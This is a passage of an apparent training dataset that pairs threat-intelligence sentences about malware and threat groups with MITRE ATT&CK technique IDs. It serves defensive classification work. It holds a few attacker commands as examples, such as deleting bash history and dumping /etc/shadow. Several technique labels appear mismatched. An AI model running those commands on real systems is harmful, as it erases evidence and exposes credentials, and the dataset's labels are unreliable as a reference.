modules used with Duqu can collect information on network connections.### Assistant: T1049: System Network Connections Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kivars has the ability to capture screenshots on the infected host.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Threat Group-3390 has used a variety of Web shells.### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OSX_OCEANLOTUS.D deletes the app bundle and dropper after execution.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,QakBot has the ability to capture web session cookies.### Assistant: T1539: Steal Web Session Cookie" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bundlore has also used base64 and RC4 with a hardcoded key to deobfuscate data.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,During a file analysis of PLAINTEE in WildFire, we observed the attackers download and execute a plugin during the runtime for that sample### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Filters are implemented as DLLs containing a method to validate potential passwords against password policies.### Assistant: T1556: Modify Authentication Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Rather than finding/modifying exploits from online or purchasing them from exploit vendors, an adversary may develop their own exploits.### Assistant: T1587: Develop Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may consume enough system resources to negatively impact and/or cause affected machines to become unresponsive.### Assistant: T1496: Resource Hijacking" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Malware can also be staged on web services, such as GitHub or Pastebin.### Assistant: T1608: Stage Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,InvisiMole can deliver trojanized versions of software and documents, relying on user execution.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT32 used the netstat -anpo tcp command to display TCP connections on the victim's machine.### Assistant: T1049: System Network Connections Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT29 used netsh to configure firewall rules that limited certain UDP outbound packets.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This type of Network DoS takes advantage of a third-party server intermediary that hosts and will respond to a given spoofed source IP address.### Assistant: T1498: Network Denial of Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sakula uses DLL side-loading, typically using a digitally signed sample of Kaspersky Anti-Virus 6.0 for Windows Workstations or McAfee's Outlook Scan About Box to load malicious DLL files.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Strike can perform port scans from an infected host.### Assistant: T1046: Network Service Scanning" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TDTESS creates then deletes log files during installation of itself as a service.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Patchwork embedded a malicious macro in a Word document and lured the victim to click on an icon to execute the malware.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may delete their commands from these logs by manually clearing the history or deleting the bash history file rm ~/.bash_history.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HOPLIGHT has multiple proxy options that mask traffic between the malware and the remote operators.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ZIRCONIUM targeted presidential campaign staffers with credential phishing e-mails.### Assistant: T1598: Phishing for Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions.### Assistant: T1548: Abuse Elevation Control Mechanism" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may hook into Windows application programming interface functions to collect user credentials.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Spark has used a splash screen to check whether an user actively clicks on the screen before running malicious code.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This indicates that a human operative was executing commands on a command line style interface, rather than an automated or GUI process### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Windshift has used links embedded in e-mails to lure victims into executing malicious code.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,POWRUNER may query the Registry by running reg query on a victim.### Assistant: T1012: Query Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,njRAT has modified the Windows firewall to allow itself to communicate through the firewall.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries can register malicious password filters to harvest credentials from local computers and/or entire domains.### Assistant: T1556: Modify Authentication Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,T9000 searches removable storage devices for files with a pre-defined list of file extensions .### Assistant: T1119: Automated Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dragonfly 2.0 accessed email accounts using Outlook Web Access.### Assistant: T1114: Email Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,One of the group's backdoors can also query the Windows Registry to gather system information, and another macOS backdoor performs a fingerprint of the machine on its first connection to the C&C server.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The Komplex payload is stored in a hidden directory at /Users/Shared/.local/kextd.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The same situation applies to authentication by key pair – the server contains a pre-defined constant public key and it allows authentication only if a particular private key is used### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,menuPass has used Ntdsutil to dump credentials.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT38 has used a custom MBR wiper named BOOTWRECK, which will initiate a system reboot after wiping the victim's MBR.### Assistant: T1529: System Shutdown/Reboot" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT41 used RDP for lateral movement.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may search content delivery network data about victims that can be used during targeting.### Assistant: T1596: Search Open Technical Databases" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A user visits a website that is used to host the adversary controlled content.### Assistant: T1189: Drive-by Compromise" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Operation Wocao has discovered the local disks attached to the system and their hardware information including manufacturer and model, as well as the OS versions of systems connected to a targeted network.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,XCSSET uses AppleScript to check the host's language and location with the command user locale of .### Assistant: T1614: System Location Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework., OnDrawClipboard### Assistant: T1115: Clipboard Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dragonfly 2.0 modified the Registry to hide create user accounts.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Leafminer used Microsoft’s Sysinternals tools to gather detailed information about remote systems.### Assistant: T1018: Remote System Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The network configuration is a file containing parameters that determine the operation of the device.### Assistant: T1602: Data from Configuration Repository" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may modify the key size used and other encryption parameters using specialized commands in a Network Device CLI introduced to the system through Modify System Image to change the configuration of the device.### Assistant: T1600: Weaken Encryption" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cadelspy has the ability to identify open windows on the compromised host.### Assistant: T1010: Application Window Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TSCookie has encrypted network communications with RC4.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,UNC2452 was able to get SUNBURST signed by SolarWinds code signing certificates by injecting the malware into the SolarWinds Orion software lifecycle.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A handle to an existing victim process is first created with native Windows API calls such as OpenThread.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,JCry has encrypted files and demanded Bitcoin to decrypt those files.### Assistant: T1486: Data Encrypted for Impact" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Duqu can be configured to have commands relayed over a peer-to-peer network of infected hosts if some of the hosts do not have Internet access.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BRONZE BUTLER downloader code has included ""0"" characters at the end of the file to inflate the file size in a likely attempt to evade anti-virus detection.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CARROTBAT has the ability to delete downloaded files from a compromised host.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Suckfly the victim's internal network for hosts with ports 8080, 5900, and 40 open.### Assistant: T1046: Network Service Scanning" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HAWKBALL has methods to check if the process the malware uses is being debugged.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Size Expansion of Configuration Information PlugX is designed to run based on its configuration information stored in itself### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Various online services continuously publish the results of Internet scans/surveys, often harvesting information such as active IP addresses, hostnames, open ports, certificates, and even server banners.### Assistant: T1596: Search Open Technical Databases" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SSL/TLS certificates are files that can be installed on servers to enable secure communications between systems.### Assistant: T1608: Stage Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ursnif has used a peer-to-peer network for C2.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Additional custom tools likely exist as well.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The domain names differed but the script adheres to the same logic (including the logic function).” The DNSMessenger malware is an obfuscated and customized version of the popular DNS_TXT_PWNAGE.ps1 script available on GitHub and is also referred to by FireEye as POWERSOURCE### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Transparent Tribe has sent spearphishing e-mails with attachments to deliver malicious payloads.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This poses a greater risk of unauthorized disclosure and may help facilitate data manipulation, Credential Access, or Collection efforts.### Assistant: T1600: Weaken Encryption" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TeamTNT has searched for system version and architecture information.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dacls can scan directories on a compromised host.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BackConfig can download and execute additional payloads on a compromised host.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Maze has checked the language of the infected system using the ""GetUSerDefaultUILanguage"" function.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SUNBURST collected the registry value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid from compromised hosts.### Assistant: T1012: Query Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An APT19 HTTP malware variant used Base64 to encode communications to the C2 server.### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Responses from the Pisloader C2 server are base32-encoded.### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WindTail has the ability to automatically exfiltrate files using the macOS built-in utility /usr/bin/curl.### Assistant: T1048: Exfiltration Over Alternative Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Threat Group-3390 actors have split RAR files for exfiltration into parts.### Assistant: T1030: Data Transfer Size Limits" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The SMOKEDHAM source code is embedded in the dropper as an encrypted string.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lazarus Group malware attempts to connect to Windows shares for lateral movement by using a generated list of usernames, which center around permutations of the username Administrator, and weak passwords.### Assistant: T1110: Brute Force" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT28 installed a Delphi backdoor that used a custom algorithm for C2 communications.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,KEYMARBLE uses a customized XOR algorithm to encrypt C2 communications.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Conti can enumerate remote open SMB network shares using NetShareEnum.### Assistant: T1135: Network Share Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Operation Wocao has collected a list of installed software on the infected system.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ShimRat has registered two registry keys for shim databases.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,QakBot can enumerate a list of installed programs.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Rocke has installed an ""init.d"" startup script to maintain persistence.### Assistant: T1037: Boot or Logon Initialization Scripts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,EvilBunny's dropper has checked the number of processes and the length and strings of its own file name to identify if the malware is in a sandbox environment.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Security can be limited on browser app stores so it may not be difficult for malicious extensions to defeat automated scanners.### Assistant: T1176: Browser Extensions" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Drovorub can use a port forwarding rule on its agent module to relay network traffic through the client module to a remote host on the same network.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Wizard Spider has also used AdFind and nltest/dclist to enumerate domain computers, including the domain controller.### Assistant: T1018: Remote System Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT29 has developed malware variants written in Python.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Strike can produce a sessions report from compromised hosts.### Assistant: T1049: System Network Connections Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may also seek and target CDN misconfigurations that leak sensitive information not intended to be hosted and/or do not have the same protection mechanisms as the content hosted on the organization’s website.### Assistant: T1596: Search Open Technical Databases" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BLUELIGHT has encoded data into a binary blob using XOR.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WMI can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RunningRAT adds itself to the Registry key Software\Microsoft\Windows\CurrentVersion\Run to establish persistence upon reboot.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may inject malicious code into hijacked processes in order to evade process-based defenses as well as possibly elevate privileges.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ISMInjector is obfuscated with the off-the-shelf SmartAssembly .NET obfuscator created by red-gate.com.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,XCSSET loads a system level launchdaemon using the launchctl load -w command from /System/Librarby/LaunchDaemons/ssh.plist.### Assistant: T1569: System Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Information about an organization may also be exposed to adversaries via online or other accessible data sets or Search Victim-Owned Websites.### Assistant: T1591: Gather Victim Org Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,While logged in, this command history is tracked in a file pointed to by the environment variable HISTFILE.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,After escalating privileges, MegaCortex calls TerminateProcess, CreateRemoteThread, and other Win32 APIs.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HAWKBALL can collect the user name of the system.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,* Modifying the Dll and FuncName Registry values in HKLM\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{SIP_GUID} that point to the DLL providing a SIP’s CryptSIPDllVerifyIndirectData function, which validates a file’s computed hash against the signed hash value.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Hooking involves redirecting calls to these functions and can be implemented via: * **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Alternate authentication material is legitimately generated by systems after a user or application successfully authenticates by providing a valid identity and the required authentication factor.### Assistant: T1550: Use Alternate Authentication Material" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT29 used fsutil to check available free space before executing actions that might create large files on disk.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sakula contains UAC bypass code for both 32- and 64-bit systems.### Assistant: T1548: Abuse Elevation Control Mechanism" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In March, we came across an email with a malware attachment that used the Gamaredon group’s tactics.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Astaroth uses WMIC to execute payloads.### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The policy of the domain also includes configuration settings that may apply between domains in a multi-domain/forest environment.### Assistant: T1484: Domain Policy Modification" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BONDUPDATER persists using a scheduled task that executes every minute.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SombRAT can encrypt strings with XOR-based routines and use a custom AES storage format for plugins, configuration, C2 domains, and harvested data.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery , Lambda Functions, Azure AD, etc.### Assistant: T1526: Cloud Service Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cracked hashes may enable Persistence, Privilege Escalation, and Lateral Movement via access to Valid Accounts.### Assistant: T1558: Steal or Forge Kerberos Tickets" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Users must specifically change settings to have these files viewable.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This behavior is related to Bypass User Account Control.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Each web shell instance is configured to contain SP, Key, and Log variables### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,At this point the process can be suspended then written to, realigned to the injected code, and resumed via SuspendThread , VirtualAllocEx, WriteProcessMemory, SetThreadContext, then ResumeThread respectively.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ShimRat has hijacked the cryptbase.dll within migwiz.exe to escalate privileges.### Assistant: T1548: Abuse Elevation Control Mechanism" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A vulnerability is a weakness in computer hardware or software that can, potentially, be exploited by an adversary to cause unintended or unanticipated behavior to occur.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,One of these domains, facebook-apps[.]com, was identified in one of the malware samples associated with this IP address### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ZeroT has encrypted its payload with RC4.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Fox Kitten has used WizTree to obtain network files and directory listings.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Large botnets can generate a significant amount of traffic from systems spread across the global Internet.### Assistant: T1498: Network Denial of Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Enterprise server applications may include features that allow developers to write and install software or scripts to extend the functionality of the main application.### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Emotet has relied upon users clicking on a malicious link delivered through spearphishing.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GuLoader has been spread in phishing campaigns using malicious web links.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Version 2 Rather than using the host ID as the key, this version uses a random XOR key between 32 and 64 bytes in length that is generated for each session### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NativeZone can check for the presence of KM.EkeyAlmaz1C.dll and will halt execution unless it is in the same directory as the rest of the malware's components.### Assistant: T1480: Execution Guardrails" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT41 has encrypted payloads using the Data Protection API , which relies on keys tied to specific user accounts on specific machines.### Assistant: T1480: Execution Guardrails" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ShimRat has installed a Windows service to maintain persistence on victim machines.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,jRAT can capture passwords from common chat applications such as MSN Messenger, AOL, Instant Messenger, and and Google Talk.### Assistant: T1552: Unsecured Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may abuse various implementations of JavaScript for execution.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may attempt to dump the contents of /etc/passwd and /etc/shadow to enable offline password cracking.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TA505 has used lures to get users to enable content in malicious attachments and execute malicious files contained in archives.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Modifying or disabling a system firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ObliqueRAT has the ability to extract data from removable devices connected to the endpoint.### Assistant: T1025: Data from Removable Media" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,AppleSeed can use a second channel for C2 when the primary channel is in upload mode.### Assistant: T1008: Fallback Channels" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Pysa can perform network reconnaissance using the Advanced IP Scanner tool.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PlugX has used DLL side-loading to evade anti-virus.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ryuk has constructed legitimate appearing installation folder paths by calling GetWindowsDirectoryW and then inserting a null byte at the fourth character of the path.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lokibot has the ability to discover the domain name of the infected host.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,EvilBunny has executed C2 commands directly via HTTP.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An adversary may compress and/or encrypt data that is collected prior to exfiltration.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT39 has used Mimikatz, Windows Credential Editor and ProcDump to dump credentials.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This can be done remotely or locally and with active or disconnected sessions.### Assistant: T1563: Remote Service Session Hijacking" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A Threat Group-3390 tool can encrypt payloads using XOR.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BoomBox can enumerate the hostname, domain, and IP of a compromised host.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The malware then appends a script extension (php, bml, or cgi) with a random number of random parameters or a file extension from the following list with no parameters: gif, jpg, png, htm, html, php### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This shortcut file calls the built-in ‘control.exe’ utility to in turn load the previously dropped malicious CPL file of ‘winhelp.cpl’### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Systemd is the default initialization system on many Linux distributions starting with Debian 8, Ubuntu 15.04, CentOS 7, RHEL 7, Fedora 15, and replaces legacy init systems including SysVinit and Upstart while remaining backwards compatible with the aforementioned init systems.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Another variation, known as a SSL renegotiation attack, takes advantage of a protocol feature in SSL/TLS.### Assistant: T1499: Endpoint Denial of Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Rising Sun can enumerate the compilation timestamp of Windows executable files.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DEATHRANSOM can download files to a compromised host.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bonadan can create bind and reverse shells on the infected system.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,When programs are executed that need additional privileges than are present in the current user context, it is common for the operating system to prompt the user for proper credentials to authorize the elevated privileges for the task .### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Darkhotel has used malware that repeatedly checks the mouse cursor position to determine if a real user is on the system.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Similar to Obfuscated Files or Information, adversaries may use environmental keying to help protect their TTPs and evade detection.### Assistant: T1480: Execution Guardrails" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Maze has disrupted systems by encrypting files on targeted machines, claiming to decrypt files if a ransom payment is made.### Assistant: T1486: Data Encrypted for Impact" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gorgon Group malware can decode contents from a payload that was Base64 encoded and write the contents to a file.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may leverage Spearphishing Attachment or Spearphishing Link as part of internal spearphishing to deliver a payload or redirect to an external site to capture credentials through Input Capture on sites that mimic email login interfaces.### Assistant: T1534: Internal Spearphishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may conduct File and Directory Permissions Modification or Modify Registry in support of subverting these controls.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT41 executed file /bin/pwd in activity exploiting CVE-2019-19781 against Citrix devices.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GrimAgent can set persistence with a Registry run key.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,There are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Stuxnet used WMI with an explorer.exe token to execute on a remote share.### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,QakBot has stored stolen emails and other data into new folders prior to exfiltration.### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It is believed that a patch management system for an anti-virus product commonly installed among targeted companies was used to distribute the Wiper malware.### Assistant: T1072: Software Deployment Tools" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may obtain and abuse credentials of a local account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion.### Assistant: T1078: Valid Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SideTwist has the ability to download additional files.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CLIs typically contain various permission levels required for different commands.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,StoneDrill has obfuscated its module with an alphabet-based table or XOR encryption.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries can use resource forks to hide malicious data that may otherwise be stored directly in files.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Azorult can delete files from victim machines.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Emissary has the capability to execute the command ipconfig /all.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The final antidebugging technique involves GetTickCount performance counters, which are placed within the main sections of code to detect any delay a debugger adds during runtime### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Figure 8: Network communication to download the Pause.ps1 payload Zyklon Delivery In all these techniques, the same domain is used to download the next level payload (Pause.ps1), which is another PowerShell script that is Base64 encoded (as seen in Figure 8)### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK 